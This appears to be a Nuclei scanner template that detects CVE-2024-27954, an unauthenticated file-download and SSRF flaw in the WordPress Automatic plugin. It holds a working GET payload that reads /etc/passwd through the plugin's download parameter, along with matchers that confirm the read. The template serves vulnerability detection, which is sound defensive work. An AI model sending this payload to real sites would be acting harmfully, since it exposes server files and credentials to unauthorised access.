id: CVE-2024-27954 info: name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF author: iamnoooob,rootxharsh,pdresearch severity: critical description: | WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1. impact: | Unauthenticated attackers can download arbitrary files from the server including sensitive credentials and backup files, and perform SSRF attacks. remediation: | Update WordPress Automatic plugin to version 3.92.1 or later. reference: - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/ - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954 classification: cvss-score: 9.8 cve-id: CVE-2024-27954 cwe-id: CWE-918 epss-score: 0.72953 epss-percentile: 0.99397 metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-automatic" tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic,vkev,vuln http: - method: GET path: - "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd" matchers-condition: and matchers: - type: word part: body words: - '"link":"file:' - type: regex regex: - "root:.*:0:0:" # digest: 4a0a0047304502210097b1e14eb33a2d77fb0a46d1216fc854962bf86024c44370caa74e4493f8bc2e02203c8c5dc431af2af2232636722d6151f39e8447da65ba3843b351b00b8ee0115b:922c64590222798bb761d5b6d8e72950